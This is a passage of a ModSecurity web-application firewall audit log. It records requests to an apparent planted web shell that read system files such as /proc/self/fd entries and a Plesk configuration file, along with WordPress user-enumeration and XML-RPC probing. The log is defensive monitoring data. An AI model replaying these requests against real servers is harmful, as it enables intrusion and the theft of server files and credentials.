"apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/56"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcgBwcFb_n1P0IC9yLrwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113408500962 5496 (- - -) Stopwatch2: 1750113408500962 5496; combined=3025, p1=477, p2=2430, p3=39, p4=29, p5=50, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4df1157e-Z-- --47af2f1f-A-- [17/Jun/2025:04:07:24.761824 +0530] aFCcpBwcFb_n1P0IC9yLugAAAAo 23.23.212.212 42472 127.0.0.1 7081 --47af2f1f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/127 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.23.212.212 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --47af2f1f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --47af2f1f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/127"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/127"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcpBwcFb_n1P0IC9yLugAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113444757460 4416 (- - -) Stopwatch2: 1750113444757460 4416; combined=2363, p1=412, p2=1814, p3=51, p4=27, p5=59, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47af2f1f-Z-- --e6aca53a-A-- [17/Jun/2025:04:07:57.169850 +0530] aFCcxaC450Yw050Ymr0ciwAAAAk 3.221.156.96 41226 127.0.0.1 7081 --e6aca53a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/157 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.221.156.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e6aca53a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --e6aca53a-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/157"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/157"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcxaC450Yw050Ymr0ciwAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113477164588 5336 (- - -) Stopwatch2: 1750113477164588 5336; combined=2817, p1=494, p2=2163, p3=52, p4=29, p5=78, sr=153, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6aca53a-Z-- --bb0ef362-A-- [17/Jun/2025:04:09:40.563935 +0530] aFCdLJVkCcfT-Z8NQYy7XwAAAAc 52.204.37.237 44906 127.0.0.1 7081 --bb0ef362-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/24 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.204.37.237 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --bb0ef362-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --bb0ef362-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/24"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/24"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCdLJVkCcfT-Z8NQYy7XwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113580558401 5610 (- - -) Stopwatch2: 1750113580558401 5610; combined=3130, p1=511, p2=2446, p3=56, p4=36, p5=81, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bb0ef362-Z-- --3be4cd1e-A-- [17/Jun/2025:04:09:56.486317 +0530] aFCdPKRT9PYLci8mxb0kcAAAAAM 98.83.10.183 33100 127.0.0.1 7081 --3be4cd1e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/138 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.83.10.183 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3be4cd1e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --3be4cd1e-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/138"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/138"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCdPKRT9PYLci8mxb0kcAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113596482264 4104 (- - -) Stopwatch2: 1750113596482264 4104; combined=2156, p1=332, p2=1705, p3=39, p4=27, p5=53, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3be4cd1e-Z-- --1c3ae03d-A-- [17/Jun/2025:04:10:08.466942 +0530] aFCdSFJfblPUQiSn5r2IJwAAAAA 3.216.86.144 53112 127.0.0.1 7081 --1c3ae03d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/22 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.216.86.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --1c3ae03d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --1c3ae03d-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/22"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/22"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCdSFJfblPUQiSn5r2IJwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113608462712 4282 (- - -) Stopwatch2: 1750113608462712 4282; combined=2308, p1=339, p2=1841, p3=38, p4=35, p5=55, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c3ae03d-Z-- --b9fde461-A-- [17/Jun/2025:04:19:43.836685 +0530] aFCfh0cTB7P_sALtclARTgAAAAI 85.204.70.90 37456 127.0.0.1 7081 --b9fde461-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: best-website-designs.com X-Real-IP: 85.204.70.90 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --b9fde461-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --b9fde461-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCfh0cTB7P_sALtclARTgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750114183179136 657636 (- - -) Stopwatch2: 1750114183179136 657636; combined=1736, p1=340, p2=1323, p3=0, p4=0, p5=72, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9fde461-Z-- --49de9e12-A-- [17/Jun/2025:04:19:49.087982 +0530] aFCfjKC450Yw050Ymr0eGwAAAAk 85.204.70.90 37658 127.0.0.1 7081 --49de9e12-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 85.204.70.90 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --49de9e12-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --49de9e12-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 85.204.70.90 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 85.204.70.90 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCfjKC450Yw050Ymr0eGwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750114188397548 690503 (- - -) Stopwatch2: 1750114188397548 690503; combined=2116, p1=369, p2=1309, p3=44, p4=63, p5=206, sr=103, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49de9e12-Z-- --c769c31c-A-- [17/Jun/2025:04:19:49.517135 +0530] aFCfjVJfblPUQiSn5r2JdAAAAAA 3.221.50.71 54570 127.0.0.1 7081 --c769c31c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/default/grub.d&viewfile=//etc/default/grub.d/init-select.cfg HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.221.50.71 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c769c31c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3122 Connection: close Content-Type: text/html; charset=UTF-8 --c769c31c-H-- Message: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/default/grub" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:viewfile: /etc/default/grub.d/init-select.cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCfjVJfblPUQiSn5r2JdAAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:viewfile: /etc/default/grub.d/init-select.cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCfjVJfblPUQiSn5r2JdAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114189512938 4250 (- - -) Stopwatch2: 1750114189512938 4250; combined=2232, p1=377, p2=1698, p3=35, p4=34, p5=87, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c769c31c-Z-- --cc08792b-A-- [17/Jun/2025:04:20:48.786280 +0530] aFCfyJVkCcfT-Z8NQYy81AAAAAc 85.204.70.90 37050 127.0.0.1 7081 --cc08792b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 85.204.70.90 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --cc08792b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cc08792b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 85.204.70.90 (70+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 85.204.70.90 (70+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCfyJVkCcfT-Z8NQYy81AAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750114248081407 704940 (- - -) Stopwatch2: 1750114248081407 704940; combined=2459, p1=408, p2=1641, p3=44, p4=67, p5=183, sr=122, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cc08792b-Z-- --4f3b562c-A-- [17/Jun/2025:04:23:00.063832 +0530] aFCgTLp3uuKArZI2bI_vfAAAAAg 216.73.216.71 59880 127.0.0.1 7081 --4f3b562c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FResourceController%2FServiceNode&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FResourceController%2FServiceNode%2FConfiguration.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4f3b562c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4395 Connection: close Content-Type: text/html; charset=UTF-8 --4f3b562c-H-- Message: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/resourcecontroller/servicenode/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/resourcecontroller/servicenode/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCgTLp3uuKArZI2bI_vfAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114380059387 4508 (- - -) Stopwatch2: 1750114380059387 4508; combined=2136, p1=369, p2=1617, p3=37, p4=37, p5=76, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f3b562c-Z-- --a651fa29-A-- [17/Jun/2025:04:25:09.608460 +0530] aFCgzIoVQnPDyHnl9oPMFAAAAAY 213.204.244.147 37180 127.0.0.1 7081 --a651fa29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) --a651fa29-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --a651fa29-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aFCgzIoVQnPDyHnl9oPMFAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750114508849911 758675 (- - -) Stopwatch2: 1750114508849911 758675; combined=1990, p1=332, p2=1520, p3=0, p4=0, p5=138, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a651fa29-Z-- --b9137213-A-- [17/Jun/2025:04:25:48.382951 +0530] aFCg87p3uuKArZI2bI_vqgAAAAg 13.233.233.215 51416 127.0.0.1 7081 --b9137213-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 13.233.233.215 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --b9137213-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --b9137213-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCg87p3uuKArZI2bI_vqgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750114547446928 936099 (- - -) Stopwatch2: 1750114547446928 936099; combined=1916, p1=343, p2=1463, p3=0, p4=0, p5=110, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9137213-Z-- --2144a111-A-- [17/Jun/2025:04:26:52.564198 +0530] aFChNHTSPZEgHS3rvxJjXwAAAAQ 44.221.180.179 56398 127.0.0.1 7081 